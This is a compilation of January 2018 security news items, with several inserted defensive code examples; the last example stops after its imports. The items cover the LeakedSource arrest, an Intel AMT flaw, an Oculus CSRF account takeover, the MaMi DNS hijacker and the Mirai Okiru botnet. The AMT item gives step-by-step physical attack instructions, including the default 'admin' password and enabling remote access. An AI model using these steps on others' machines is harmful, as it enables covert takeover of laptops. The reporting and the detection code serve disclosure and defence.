According to the Royal Canadian Mounted Police (RCMP), the 27-year-old Jordan Evan Bloom of Thornhill is the person behind the notorious LeakedSource.com—a major repository that compiled public data breaches and sold access to the data, including plaintext passwords.
Launched in late 2015, LeakedSource had collected around 3 billion personal identity records and associated passwords from some of the massive data breaches, including LinkedIn, VK.com, Last.Fm, Ashley Madison, MySpace, Twitter, Weebly and Foursquare, and made them accessible and searchable to anyone for a fee.
LeakedSource was shut down, and its associated social media accounts have been suspended after the law enforcement raided its operator earlier last year.
However, another website with the same domain name hosted by servers in Russia is still in operation.
Bloom is accused of operating the notorious website and claimed to have earned nearly US$200,000 by selling stolen personal identity records and associated passwords for a "small fee" via his site.
Appeared in a Toronto court on Monday, January 15, Bloom charged with trafficking in identity information, mischief to data, unauthorised use of a computer, and possession of property obtained by crime, the RCMP said.
"This investigation is related to claims about a website operator alleged to have made hundreds of thousands of dollars selling personal information," the RCMP Cybercrime Investigative Team said in a statement.
"The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality."
Bloom was arrested and charged on December 22, 2017, as part of the RCMP's national cybercrime division investigation, dubbed 'Project Adoration.'
The RCMP said the Dutch national police and the United States' FBI assisted in the operation, adding the case could not have been cracked without international collaboration.
Bloom is currently in custody and due back in court on February 16.
Cybersecurity lawyer Imran Ahmad told Reuters that Bloom could face a maximum sentence 10 years in prison.


New Intel AMT Security Issue Lets Hackers Gain Full Control of Laptops in 30 Seconds

17.1.2018 thehackernews Attack

It's been a terrible start to the new year for Intel.
Researchers warn of a new attack which can be carried out in less than 30 seconds and potentially affects millions of laptops globally.
As Intel was rushing to roll out patches for Meltdown and Spectre vulnerabilities, security researchers have discovered a new critical security flaw in Intel hardware that could allow hackers to access corporate laptops remotely.
Finnish cyber security firm F-Secure reported unsafe and misleading default behaviour within Intel Active Management Technology (AMT) that could allow an attacker to bypass login processes and take complete control over a user's device in less than 30 seconds.
AMT is a feature of Intel-based chipsets that gives IT administrators and managed service providers better control over their device fleets, allowing them to remotely manage and repair PCs, workstations, and servers in their organisation.
The bug allows anyone with physical access to the affected laptop to bypass the need to enter login credentials—including user, BIOS and BitLocker passwords and TPM pin codes—enabling remote administration for post-exploitation.
In general, setting a BIOS password prevents an unauthorised user from booting up the device or making changes to the boot-up process. But this is not the case here.
The password doesn't prevent unauthorised access to the AMT BIOS extension, thus allowing attackers access to configure AMT and making remote exploitation possible.
Although researchers have discovered some severe AMT vulnerabilities in the past, the recently discovered issue is of particular concern because it:
is easy to exploit without a single line of code,
affects most Intel corporate laptops, and
could enable attackers to gain remote access to the affected system for later exploitation.
"The attack is almost deceptively simple to enact, but it has incredible destructive potential," said F-Secure senior security researcher Harry Sintonen, who discovered the issue in July last year.
"In practice, it can give a local attacker complete control over an individual’s work laptop, despite even the most extensive security measures."
According to the researchers, the newly discovered bug has nothing to do with the Spectre and Meltdown vulnerabilities recently found in the microchips used in almost all PCs, laptops, smartphones and tablets today.

To exploit this issue, all an attacker with physical access to a password (login and BIOS) protected machine needs to do is reboot or power-up the targeted PC and press CTRL-P during boot-up, as demonstrated by researchers at F-Secure in the above video.
The attacker then can log into Intel Management Engine BIOS Extension (MEBx) with a default password.
Here, the default password for MEBx is "admin," which most likely remains unchanged on most corporate laptops.
Once logged in, the attacker can then change the default password and enable remote access, and even set AMT's user opt-in to "None."
Now that the attacker has effectively backdoored the machine, he or she can access the system remotely by connecting to the same wireless or wired network as the victim.
Although exploiting the issue requires physical access, Sintonen explained that the speed at which it can be carried out makes it easily exploitable, adding that even a minute's distraction of the target away from the laptop is enough to do the damage.
"Attackers have identified and located a target they wish to exploit. They approach the target in a public place—an airport, a café or a hotel lobby—and engage in an 'evil maid' scenario," Sintonen says.
"Essentially, one attacker distracts the mark, while the other briefly gains access to his or her laptop. The attack doesn't require a lot of time—the whole operation can take well under a minute to complete."
Along with CERT-Coordination Center in the United States, F-Secure has notified Intel and all relevant device manufacturers about the security issue and urged them to address it urgently.
Meanwhile, users and IT administrators in an organisation are recommended to change the default AMT password of their device to a strong one or disable AMT if this option is available, and never leave their laptop or PC unattended in a public place.


Skype Finally Adds End-to-End Encryption for Private Conversations

17.1.2018 thehackernews Social

Good news for Skype users who are concerned about their privacy.
Microsoft is collaborating with popular encrypted communication company Signal to bring end-to-end encryption support to Skype messenger.
End-to-end encryption assures users that no one, not even the company or server that transmits the data, can decrypt their messages.
Signal Protocol is an open source cryptographic protocol that has become an industry-wide standard—which is used in Facebook Messenger, Whatsapp, and Google Allo for secure messaging.
Dubbed Private Conversations, the new feature which is about to be introduced in Skype will offer end-to-end encryption for audio calls, text, and multimedia messages like videos and audio files.
"Skype Private Conversations give you enhanced security through end-to-end encryption with an additional layer of security for conversations between you and your friends and family," the company announced.
"Private Conversations can only be between you and one other contact. This is not supported in groups."
How to Start Skype End-to-End Encrypted Calls and Chats
Private Conversations is already available to the Skype Insider program, a platform that allows Skype users to test new features before they are rolled out to the rest of its more than 300 million users worldwide.
To initiate a new secure communication with your Skype contact, you need to tap or click on the (+) icon, select 'New Private Conversation' and then select the contact you would like to start the secure communication with.
A Private Conversation will have a lock icon next to your Skype contact's name. Preview messages from Private Conversations will not appear in the chat list or notifications.
Unlike in WhatsApp, end-to-end encryption is not enabled by default in Skype; users need to select 'New Private Conversation' from the app's "Compose" menu, or from another user's profile, to initiate a secure conversation, much like Facebook Messenger's Secret Conversations, which is also based on Signal.
Unfortunately, Private Conversations also does not currently support video calling, though video calls remain protected by the standard encryption that Microsoft already provides with its Skype service.
Also, even with Private Conversations enabled, Skype will still be able to access some information (metadata) about your secure communications, such as when you initiate them and how long the conversation lasts.
Skype Insider users can test Private Conversations using Skype build version 8.13.76.8 for iOS, Android, Linux, Mac, and Windows Desktop.


How to hack Facebook accounts exploiting CSRF in Oculus app
17.1.2018 securityaffairs
Social

Facebook has fixed a couple of vulnerabilities that could have been exploited by attackers to hijack accounts by abusing integration with the Oculus virtual reality headset.
In March 2014, Facebook founder Mark Zuckerberg announced the acquisition of Oculus VR and included the handsets produced by the company to its bug bounty program.

White hat hackers discovered several vulnerabilities in Oculus platform since, including the ones addressed now by Facebook.

The flaws were reported in October by the security consultant Josip Franjković, who analyzed the Oculus application for Windows.

“Oculus enables users to connect their Facebook accounts for a more “social” experience. This can be done using both the native Windows Oculus application and using browsers.” wrote Franjković. “I took a deeper look at the native Windows flow, and found a CSRF vulnerability which allowed me to connect a victim’s Facebook account to attacker’s Oculus account. Once connected, the attacker could extract the victim’s access token, and use Facebook’s GraphQL queries to take over the account.”


One of the features implemented by the Oculus application is authentication to a Facebook account. Franjković discovered that attackers could have exploited specially crafted GraphQL queries to connect any user’s Facebook account to their own Oculus account.

GraphQL is a query language created by Facebook in 2012 for describing the capabilities and requirements of data models for client-server applications. A GraphQL query is a string that is sent to a server to be interpreted and fulfilled, which then returns JSON to the client.

Franjković discovered that a specially crafted query allowed an attacker to obtain the victim’s access token and use it to impersonate the victim by accessing his account.

In a proof-of-concept attack, Franjković shows how to use a specially crafted query to add a new mobile phone number to the targeted account and use it to reset the victim’s password.

The vulnerability was reported to Facebook on October 24; the social network giant temporarily resolved the issue by disabling the facebook_login_sso endpoint.

On October 30, Facebook rolled out a patch to address definitively the problem, but a few weeks later, the expert discovered a login cross-site request forgery (CSRF) flaw that could have been exploited to bypass Facebook’s patch.

The expert informed Facebook on November 18, and the company again disabled the facebook_login_sso endpoint to mitigate the problem. A complete patch was rolled out after a few weeks.

Facebook paid the expert for his discoveries and classified the vulnerabilities as critical.

The step-by-step procedure the researcher used is described on his blog; below is the timeline of the hack:

24th of October, 2017, 03:20 – Report sent to Facebook
24th of October, 2017, 10:50 – First reply from Facebook
24th of October, 2017, 11:30 – Temporary fix for the bug (disabled /facebook_login_sso/ endpoint)
30th of October, 2017 – Bug is now fixed.
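The class of bug described above, a login CSRF in an account-linking flow, is defeated when the link callback is bound to the browser session that started it. The code below is an added example of that binding, not Oculus or Facebook code; the session ids, account names and the 10-minute lifetime are constructed.

```python
"""Binding an SSO account-link callback to the browser session that started the flow.

Added example illustrating the class of login CSRF described above; it is not Oculus or
Facebook code, and the session ids, account names and 10-minute lifetime are constructed.
"""
import hashlib
import hmac
import secrets
import time

STATE_TTL_SECONDS = 600  # assumption: a link flow must complete within ten minutes


def _tag(server_secret, session_id, issued_at, nonce):
    """HMAC tying a state value to one session: the same nonce verifies differently elsewhere."""
    msg = f"{session_id}|{issued_at}|{nonce}".encode()
    return hmac.new(server_secret, msg, hashlib.sha256).hexdigest()


def begin_link(server_secret, session_id, now=None):
    """Step 1 (application side): issue a state value for the session asking to link an
    identity-provider account. The state travels to the provider and is echoed back."""
    issued_at = int(time.time()) if now is None else int(now)
    nonce = secrets.token_urlsafe(16)  # url-safe alphabet, so '.' is free to use as separator
    return f"{issued_at}.{nonce}.{_tag(server_secret, session_id, issued_at, nonce)}"


def verify_state(server_secret, session_id, state, now=None):
    """True only if `state` was issued for `session_id` and is still within its lifetime."""
    now = int(time.time()) if now is None else int(now)
    try:
        issued_str, nonce, tag = state.split(".")
        issued_at = int(issued_str)
    except ValueError:
        return False
    if not 0 <= now - issued_at <= STATE_TTL_SECONDS:
        return False
    return hmac.compare_digest(tag, _tag(server_secret, session_id, issued_at, nonce))


def complete_link(server_secret, session_id, state, idp_account, links, now=None):
    """Step 2 (callback): record idp_account against the app account behind session_id,
    but only when the state proves that this very session started the flow.
    `links` is a constructed store mapping app session -> linked provider account."""
    if not verify_state(server_secret, session_id, state, now):
        return False
    links[session_id] = idp_account
    return True


def demo_csrf_attempt():
    """Replays the shape of the attack above against the hardened flow (constructed data)."""
    secret = secrets.token_bytes(32)
    links = {}
    attacker_session, victim_session = "sess-attacker", "sess-victim"
    # The attacker starts a link flow in their own application session and keeps the state.
    state_a = begin_link(secret, attacker_session, now=1_000)
    # The victim's browser is steered to the callback carrying that state together with the
    # victim's provider identity; it presents the victim's own session, not the attacker's.
    forged = complete_link(secret, victim_session, state_a, "victim@idp.example", links, now=1_010)
    # Completing in the session that issued the state is the only thing that succeeds.
    legit = complete_link(secret, attacker_session, state_a, "attacker@idp.example", links, now=1_020)
    # A captured state is useless once its lifetime has passed.
    stale = verify_state(secret, attacker_session, state_a, now=1_000 + STATE_TTL_SECONDS + 1)
    return {"forged_link_accepted": forged, "legit_link_accepted": legit,
            "stale_state_valid": stale, "links": links}
```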


Game of Drones – Researchers devised a technique to detect drone surveillance
17.1.2018 securityaffairs IT

A group of Israeli researchers at Ben Gurion University have built a proof-of-concept system that can tell whether a surveillance drone is watching a given target.
Drones have created a new threat to people’s privacy. Anyone with a drone equipped with a video camera can potentially violate our privacy by streaming the subject in his/her private space over an encrypted first person view (FPV) channel.

Experts suggested many methods to detect nearby drones, but they all suffer from the same shortcoming: they cannot identify exactly what is being captured, and therefore they fail to distinguish between the legitimate use of a drone (for example, to use a drone to film a selfie from the air) and illegitimate use that invades someone’s privacy (when the same operator uses the drone to stream the view into the window of his neighbor’s apartment), a distinction that in some cases depends on the orientation of the drone’s video camera rather than on the drone’s location.

A group of Israeli researchers at Ben Gurion University in Beer Sheva (Ben Nassi, Raz Ben-Netanel, Adi Shamir, Yuval Elovici) have built a proof-of-concept system against surveillance operated with spying drones that is able to determine whether a certain person or object is under drone surveillance.

The system first generates a recognizable pattern on whatever subject someone might want to guard against aerial surveillance, then the researchers remotely intercept the drone’s radio signals and scan the streaming video the drone sends to its operator for that pattern.

“In this paper, we shatter the commonly held belief that the use of encryption to secure an FPV channel prevents an interceptor from extracting the POI that is being streamed. We show methods that leverage physical stimuli to detect whether the drone’s camera is directed towards a target in real time.” wrote the researchers.

“We investigate the influence of changing pixels on the FPV channel (in a lab setup). Based on our observations we demonstrate how an interceptor can perform a side-channel attack to detect whether a target is being streamed by analyzing the encrypted FPV channel that is transmitted from a real drone (DJI Mavic) in two use cases: when the target is a private house and when the target is a subject.”
The experts leverage the “delta frames” technique: instead of encoding video as a series of raw images, the stream is compressed into a series of changes from the previous image. A stream of a still object therefore contains fewer bytes of data than a stream of an object in motion or of images that continuously change color.

That compression feature can reveal key information about the content of the video to someone who’s intercepting the streaming data, the technique works even when data is encrypted.

In their tests, the Ben Gurion researchers used a “smart film” to toggle the opacity of several panes of a house’s windows. They used a DJI Mavic quadcopter to spy on the house and demonstrated that the technique was able to detect the panes changing from opaque to transparent and back again. They used a parabolic antenna and a laptop to intercept the drone’s radio signals sent back to the operator and searched the encrypted data stream for the pattern to determine whether the UAV was being used for aerial surveillance of the house.
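The detection step reduces to statistics on frame sizes. The code below is an added example of the delta-frame side channel just described, not the Ben Gurion team's code: it constructs per-frame sizes of an encrypted stream (no real drone capture), toggles the guarded object on a pseudo-random schedule, and reports whether the stream reacts to the toggles.

```python
"""Detecting whether an encrypted FPV stream reacts to a physical stimulus, from frame sizes alone.

Added example illustrating the delta-frame side channel described above; it is not the Ben
Gurion team's code. Frame sizes are constructed, not captured from a real drone.
"""
import random
import statistics

FPS = 30
BASELINE_BYTES = 3000        # constructed: typical size of a delta frame of a static scene
TOGGLE_EXTRA_BYTES = 4000    # constructed: extra bytes the encoder emits when many pixels change
DETECTION_THRESHOLD = 4.0    # z-score above which we say the stream reacts to our stimulus


def stimulus_schedule(n_frames, n_toggles, seed=7):
    """Frame indices at which the guarded object changes appearance (e.g. window film toggled).

    A pseudo-random schedule is used so that a periodic scene change (traffic, a fan) is
    unlikely to line up with it by accident; a fixed seed keeps the example reproducible.
    """
    rng = random.Random(seed)
    return sorted(rng.sample(range(FPS, n_frames - FPS), n_toggles))


def simulate_frame_sizes(n_frames, toggles, camera_on_target, seed=11):
    """Constructed per-frame sizes of an encrypted video stream.

    Encryption hides the pixels but not the size of each delta frame, so frames right after
    a toggle are larger only if the camera actually sees the target.
    """
    rng = random.Random(seed)
    sizes = [max(1, int(rng.gauss(BASELINE_BYTES, 200))) for _ in range(n_frames)]
    if camera_on_target:
        for t in toggles:
            sizes[t] += TOGGLE_EXTRA_BYTES            # the frame in which the change appears
            sizes[t + 1] += TOGGLE_EXTRA_BYTES // 2   # encoder settles over the next frame
    return sizes


def reaction_score(sizes, toggles):
    """z-score of the mean frame size at toggle instants against all other frames.

    Frames immediately after a toggle are left out of the baseline so a real reaction
    does not inflate the 'normal' size it is compared against.
    """
    toggle_set = set(toggles)
    at_toggle = [sizes[t] for t in toggles]
    others = [s for i, s in enumerate(sizes)
              if i not in toggle_set and i - 1 not in toggle_set]
    mu, sd = statistics.mean(others), statistics.pstdev(others)
    if sd == 0:
        return 0.0
    return (statistics.mean(at_toggle) - mu) / (sd / len(at_toggle) ** 0.5)


def is_under_surveillance(sizes, toggles):
    """True if the intercepted stream's bitrate tracks our stimulus schedule."""
    return reaction_score(sizes, toggles) >= DETECTION_THRESHOLD


def run_demo(n_frames=FPS * 20, n_toggles=10):
    """Twenty seconds of stream, once with the camera on the target and once pointed elsewhere."""
    toggles = stimulus_schedule(n_frames, n_toggles)
    watched = simulate_frame_sizes(n_frames, toggles, camera_on_target=True)
    elsewhere = simulate_frame_sizes(n_frames, toggles, camera_on_target=False)
    return {"watched": is_under_surveillance(watched, toggles),
            "elsewhere": is_under_surveillance(elsewhere, toggles)}


if __name__ == "__main__":
    print(run_demo())
```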


“In another test, they put blinking LED lights on a test subject’s shirt, and then were able to pull out the binary code for “SOS” from an encrypted video focused on the person, showing that they could even potentially “watermark” a drone’s video feed to prove that it spied on a specific person or building.” reported Wired.

Nassi confirmed that their technique works at ranges at which it is very difficult to spot a surveillance drone in the sky; the researchers tested it from a range of about 150 feet, and the range can be extended by using a more powerful antenna.


Mobile App Flaws of SCADA ICS Systems Could Allow Hackers To Target Critical Infrastructure
17.1.2018 securityaffairs ICS

IOActive researchers warn that critical infrastructure mobile applications are being developed without secure coding compliance, which could allow hackers to target SCADA systems.
In a report released today, IOActive researchers advise that critical infrastructure mobile applications are being developed without secure coding compliance, which could allow hackers to target Supervisory Control and Data Acquisition Industrial Control Systems.

SCADA-ICS stands for Supervisory Control and Data Acquisition Industrial Control System and refers to the industrial automated systems operating critical infrastructure. These systems are responsible for the control and operation of critical services such as clean water and energy. IOActive researchers released a report analyzing the impact on the security of SCADA-ICS systems of their connection to the Internet of Things (IoT) and mobile applications.

The report states that mobile applications are present in many ICS segments and can be divided into two groups, local (Wi-Fi, Bluetooth) and remote (Internet, VPN), which are exposed to three types of attack: unauthorized physical access to the device or “virtual” access to device data; compromise of the communication channel (MitM); and compromise of the application.


Considering these attacks, mobile SCADA applications can lead to directly or indirectly influencing an industrial process or industrial network infrastructure, or to an operator unwillingly performing a harmful action on the system.

The research was conducted based on OWASP 2016 and analyzed apps from 34 vendors released on the Google Play Store. The analysis identified 147 security issues related to secure coding practices that would allow code tampering.

The researchers noted that hackers could gain remote control of smartphones to launch further attacks on the vulnerable ICS apps and the hardware and software they control. The researchers also pointed out an increase of 16 vulnerabilities per application.

Regarding the vulnerabilities, the researchers found that insecure authorization was present, with some apps failing to include any form of authentication. Other vulnerabilities, such as susceptibility to reverse engineering, were present due to the absence of code obfuscation. Insecure data storage and unintended data leakage were also present, which could allow hackers to access the app or data related to the Supervisory Control and Data Acquisition system.

The security of society is at stake, since these new vulnerabilities pose a great threat, even greater than the damage caused by the 2016 Ukrainian attack. The report recommends that app developers consider secure coding in their development planning because of the impact on society these flaws represent.


New MaMi Malware targets macOS systems and changes DNS settings
17.1.2018 securityaffairs Apple

The popular security researcher Patrick Wardle has spotted MaMi, a new piece of malware designed to hijack DNS settings on macOS devices.
The cyber security expert and former NSA hacker Patrick Wardle has made the headlines once again; this time the researcher has spotted a new strain of malware dubbed MaMi, designed to hijack DNS settings on macOS devices.

Wardle first obtained a sample of the MaMi malware after a user reported on the Malwarebytes forums that their teacher's Mac had been infected by malware that set the DNS servers to 82.163.143.135 and 82.163.142.137.


At the time of its discovery it was undetected by all engines on VirusTotal. OSX/MaMi isn't particularly advanced, but the researcher remarked that it alters infected systems in rather nasty and persistent ways.

“Since there are already several (IMHO unrelated) malware specimens that perform DNS hijacking (that are named ‘DNSChanger’, etc), I decided to call it OSX/MaMi due to a core class the malware named: ‘SBMaMiSettings’ ” wrote Wardle.

“Ok, that’s a wrap. OSX/MaMi isn’t particular advanced – but does alter infected systems in rather nasty and persistent ways. By installing a new root certificate and hijacking the DNS servers, the attackers can perform a variety of nefarious actions such as man-in-the-middle’ing traffic (perhaps to steal credentials, or inject ads). “

The malicious code acts as a DNS hijacker, but it also implements other features for taking screenshots, simulating mouse events, downloading and uploading files, and executing commands.

The researcher found the malware hosted on several websites but was not able to determine the distribution channel. It is likely that MaMi has been delivered via email, fake security alerts and pop-ups on websites, or other social engineering.

Wardle noticed that the malware did not exercise any of these features during his analysis, likely because they require attacker-supplied input or other preconditions that were not met in the virtualized test lab he used.

Once MaMi has infected a Mac, it invokes the macOS security command-line tool to install a new root certificate (dcdata.bin) that it downloads from the internet.

How to tell whether a macOS system is infected with the MaMi malware?

Users can check their DNS settings (System Preferences > Network > Advanced > DNS, or networksetup -getdnsservers on the command line): the malicious code sets the DNS servers to 82.163.143.135 and 82.163.142.137.
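A scripted version of that check, added here as an example (it is not Wardle's code or part of the malware): it parses the resolver list printed by scutil --dns and flags the two server addresses reported in the article. The sample scutil output is constructed; on a real Mac the script also runs scutil itself.

```python
"""Flag MaMi-style DNS hijacking on macOS from the resolver configuration.

Added example for this article. It parses `scutil --dns` output (or any text
containing `nameserver[N] : a.b.c.d` lines) and reports resolvers matching
the two servers the article names as MaMi indicators.
"""
import re
import subprocess

# DNS servers the article reports MaMi configuring on infected Macs.
MAMI_DNS_SERVERS = {"82.163.143.135", "82.163.142.137"}

# Matches lines such as "  nameserver[0] : 82.163.143.135" in `scutil --dns` output.
_NAMESERVER_RE = re.compile(r"nameserver\[\d+\]\s*:\s*([0-9a-fA-F:.]+)")

# Constructed sample, shaped like `scutil --dns` output on an infected machine.
SAMPLE_SCUTIL_OUTPUT = """\
DNS configuration

resolver #1
  nameserver[0] : 82.163.143.135
  nameserver[1] : 82.163.142.137
  if_index : 4 (en0)
  flags    : Request A records
  reach    : 0x00000002 (Reachable)

resolver #2
  domain   : local
  options  : mdns
  timeout  : 5
  flags    : Request A records
  reach    : 0x00000000 (Not Reachable)
  order    : 300000
"""


def parse_nameservers(scutil_output: str) -> list:
    """Return every resolver address listed in the text, in order, de-duplicated."""
    seen = []
    for match in _NAMESERVER_RE.finditer(scutil_output):
        addr = match.group(1)
        if addr not in seen:
            seen.append(addr)
    return seen


def find_mami_indicators(scutil_output: str) -> list:
    """Return the configured resolvers that match the MaMi indicator list."""
    return [ns for ns in parse_nameservers(scutil_output) if ns in MAMI_DNS_SERVERS]


def check_live_system() -> list:
    """Run `scutil --dns` on this host and return matching indicators.

    Returns an empty list if scutil is unavailable (e.g. on Linux) so the
    parsing functions stay usable anywhere.
    """
    try:
        out = subprocess.run(["scutil", "--dns"], capture_output=True,
                             text=True, check=True).stdout
    except (FileNotFoundError, subprocess.CalledProcessError):
        return []
    return find_mami_indicators(out)


if __name__ == "__main__":
    hits = find_mami_indicators(SAMPLE_SCUTIL_OUTPUT)
    print("constructed sample:", "INFECTED" if hits else "clean", hits)
    live = check_live_system()
    print("this host:", "INFECTED" if live else "clean or not macOS", live)
```

A clean DNS list is not proof of a clean machine: the article notes that MaMi also installs a root certificate, so the trusted roots in the System keychain should be reviewed as well.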

Patrick Wardle also maintains a free open-source firewall for macOS named ‘LuLu,’ which can block the suspicious traffic generated by OSX/MaMi.

MaMi is not the first DNS-changer malware. The best-known example is DNSChanger, a threat that targeted both Windows and OS X machines and infected millions of devices worldwide.


Fappening – A fourth man has been charged with hacking into over 250 Apple iCloud accounts belonging to celebrities
17.1.2018 securityaffairs Apple

Fappening – A fourth hacker, George Garofano (26), of North Branford, has been charged with hacking into over 250 Apple iCloud accounts belonging to celebrities.

Garofano was arrested by the FBI and charged in federal court with violating the Computer Fraud and Abuse Act.

From April 2013 through October 2014, Garofano used phishing attacks to obtain the victims' iCloud account credentials, accessed the accounts and stole personal information, including private photographs and videos.

“According to the plea agreement, from April 2013 through October 2014, Garofano engaged in a phishing scheme to obtain usernames and passwords for iCloud accounts. Garofano admitted that he sent e-mails to victims that appeared to be from security accounts of Apple and encouraged the victims to send him their usernames and passwords, or to enter them on a third-party website, where he would later retrieve them.” reads the press release published by the DoJ.

“Garofano used the usernames and passwords to illegally access his victims’ iCloud accounts, which allowed him to steal personal information, including sensitive and private photographs and videos, according to his plea agreement. In some instances, Garofano traded the usernames and passwords, as well as the materials he stole from the victims, with other individuals.”

In the Fappening case, nude pictures of many celebrities were leaked online; the long list of victims includes Kim Kardashian, Kate Upton, and Jennifer Lawrence.

Garofano also traded the stolen credentials, as well as the information he stole from the victims’ accounts, with other individuals.

In a plea agreement signed last week in U.S. District Court in Los Angeles, Garofano agreed to plead guilty to one count of unauthorized access to a protected computer to obtain information.

The man is now facing up to 5 years in federal prison.


Garofano is the fourth man charged in connection with the Fappening saga; in past months Emilio Herrera, Edward Majerczyk and Ryan Collins pleaded guilty to their involvement in the attacks on the celebrities' iCloud accounts.

Collins was sentenced to 18 months in federal prison and Majerczyk to nine months; Herrera is awaiting sentencing next month.


Lenovo spotted and fixed a backdoor in RackSwitch and BladeCenter networking switches
17.1.2018 securityaffairs Vulnerability

Lenovo discovered a firmware backdoor in RackSwitch and BladeCenter networking switch families during an internal security audit.
Security experts at Lenovo spotted a firmware backdoor, tracked as CVE-2017-3765, in the RackSwitch and BladeCenter networking switch families during an internal security audit.

The authentication bypass affects only RackSwitch and BladeCenter switches running ENOS (Enterprise Network Operating System); Lenovo addressed it with firmware updates last week.

The Enterprise Network Operating System (ENOS) is the firmware that powers some Lenovo and IBM RackSwitch and BladeCenter switches.

According to the security advisory published by Lenovo, the backdoor (dubbed “HP backdoor”) was added to ENOS in 2004 when ENOS was owned by Nortel’s Blade Server Switch Business Unit.

Nortel added the backdoor intentionally, at the request of a BSSBU OEM customer.

“An authentication bypass mechanism known as “HP Backdoor” was discovered during a Lenovo security audit in the Telnet and Serial Console management interfaces, as well as the SSH and Web management interfaces under certain limited and unlikely conditions.” states the security advisory.

“A source code revision history audit revealed that this authentication bypass mechanism was added in 2004 when ENOS was owned by Nortel’s Blade Server Switch Business Unit (BSSBU). The mechanism was authorized by Nortel and added at the request of a BSSBU OEM customer.”

The backdoor survived three changes of ownership: Nortel spun BSSBU off in 2006 as BLADE Network Technologies (BNT), IBM acquired BNT in 2010, and Lenovo bought IBM's BNT portfolio in 2014, yet the HP backdoor was never removed.

The bypass can be triggered when performing local authentication under specific circumstances, using credentials that are unique to each switch; exploiting it would grant the attacker admin-level access.

The ENOS interfaces and authentication configurations affected by the issue are:

Telnet and Serial Console when performing local authentication, or a combination of RADIUS, TACACS+, or LDAP and local authentication under specific circumstances described below
Web when performing a combination of RADIUS or TACACS+ and local authentication combined with an unlikely condition under specific circumstances described below
SSH for certain firmware released in May 2004 through June 2004 (only) when performing a combination of RADIUS or TACACS+ and local authentication under specific circumstances described below; the vulnerable code is present in more recent firmware, but not used

Lenovo has provided the firmware source code to a third-party security partner to enable an independent investigation of the issue, and stressed that such a mechanism is unacceptable:

“The existence of mechanisms that bypass authentication or authorization are unacceptable to Lenovo and do not follow Lenovo product security or industry practices. Lenovo has removed this mechanism from the ENOS source code and has released updated firmware for affected products.” continues the advisory

“Lenovo is not aware of this mechanism being exploited, but we assume that its existence is known, and customers are advised to upgrade to firmware which eliminates it.”

Lenovo released firmware updates for both newer and older (IBM-branded) RackSwitch and BladeCenter networking switch families.

The full list of affected switches, with links to the latest firmware, is included in the advisory.

Lenovo confirmed that the backdoor doesn’t affect the switches running CNOS (Cloud Network Operating System).


Mirai Okiru botnet is the first malware to target ARC-based IoT devices
17.1.2018 securityaffairs BotNet

Researcher @unixfreaxjp of MalwareMustDie has spotted what the team describes as the first Linux malware ever designed to infect ARC CPUs; the new Linux ELF malware was dubbed Mirai Okiru.
In August 2016 the same researcher first spotted the dreaded Mirai botnet; now he is announcing what the team calls a new big earthquake in the malware community.

According to MalwareMustDie, this is the first time a piece of malware has specifically targeted ARC-based systems, and Mirai Okiru was undetected by almost all antivirus engines at the time of its discovery.


“!! Please be noted of this fact, and be ready for the bigger impact on infection Mirai (specially Okiru) to devices that hasn’t been infected yet.” said #MalwareMustDie

The Linux IoT threat landscape is rapidly changing: crooks are now targeting IoT devices built on ARC CPUs.

“From this day, the landscape of #Linux #IoT infection will change. #ARC cpu has produced #IoT devices more than 1 billion per year. So these devices are what the hackers want to aim to infect #ELF #malware with their #DDoS cannons. It’s a serious threat will be. #MalwareMustDie!” wrote MMD.

As the researcher highlights, the impact of such a botnet could be devastating: ARC embedded processors are estimated to ship in more than 1.5 billion products per year, so the number of potentially exposed devices is enormous, and a botnet of that size could be used for a multitude of malicious purposes.

“ARC (Argonaut RISC Core) embedded processors are a family of 32-bit CPUs originally designed by ARC International. They are widely used in SoC devices for storage, home, mobile, automotive, and Internet of Things applications. ARC processors have been licensed by more than 200 organizations and are shipped in more than 1.5 billion products per year.” reads Wikipedia.

@_odisseus, 9:40 PM - Jan 14, 2018: "This is the FIRST TIME ever in the history of computer engineering that there is a malware for ARC CPU, & it is #MIRAI OKIRU!! Pls be noted of this fact, & be ready for the bigger impact on infection Mirai (specially #Okiru) to devices hasn't been infected yet. #MalwareMustDie"

“#Mirai #Okiru variant is very dangerous, if you see how the coder made specific “innovative modification” in its variant codes+encryption you’ll see what I mean, & now they are the 1st malware to aim #ARC core. These guys can make greater chaos if not be stopped. Mark my word” wrote MalwareMustDie.

It is important to understand that the Mirai Satori variant is very different from Okiru, as explained by MalwareMustDie.

“From what we observe so far. these two types are very different, (among of several common similar characteristic), we think it is good to have different rules to detect Mirai variant Okiru and Satori
Some simple highlights to differ Okiru to Satori variant:
The config is different, Okiru variant’s config is encrypted in two parts w/ telnet bombardment password encrypted, Satori does not split it in 2parts and doesn’t encrypt brute default passwords. Also Okiru’s telnet attack login information is a bit longer (can be up to 114 credentials, max counted), while Satori is having different and shorter database.
Satori seem to have “TSource Engine Query” common Distributed “Reflective” (DRDoS) attack function via random UDP, while Okiru does not seem to have this function,
The infection follow up commands written in both Okiru and Satori in their configurations are a bit different, showing possibility that they don’t seem sharing a same “herding environment”,
(up to) Four types of router attack exploit code has only being spotted hard coded in Okiru variant, yet Satori does not use these exploits at all,
Satori (see VT comment part for reversed code) is using small embedded ELF trojan downloaders to download other architecture binaries which were coded differently compared to Okiru ones (see reversed code is in VT comment),
(there are more minors stuff too that you can notice using the pictures shown in previous points, like differences in usage of watchdog, the usage of command “echo -en \x…” etc)
” wrote MalwareMustDie.

The ARC build of the Mirai Okiru ELF (botnet client) as identified by the file utility: ELF 32-bit LSB executable, ARC Cores Tangent-A5, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, for GNU/Linux 4.8.0, stripped.
The risk that someone could build a powerful Mirai Okiru botnet composed of a billion devices is real.

Researchers from MalwareMustDie published a YARA rule for the threat:

https://github.com/unixfreaxjp/rules/blob/master/malware/MALW_Mirai_Okiru_ELF.yar

and IoCs:

MD5: 9c677dd17279a43325556ec5662feba0
MD5: 24fc15a4672680d92af7edb2c3b2e957
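The file output quoted above is produced from the ELF header's e_machine field, which is a cheap way to triage a pile of IoT samples by target CPU before running the YARA rule. The parser below is an added example, not MalwareMustDie's code or rule; it reads the ELF32 header, maps the ARC machine values (libmagic prints "ARC Cores Tangent-A5" for e_machine 93), and extracts the PT_INTERP path. The sample bytes are a constructed minimal ELF, not the malware; the ARM value is used only as a non-ARC comparison.

```python
"""Triage ELF samples by target CPU, flagging ARC builds such as Mirai Okiru.

Added example for this article. Handles little-endian ELF32 only, which is
what the article's `file` output describes.
"""
import struct

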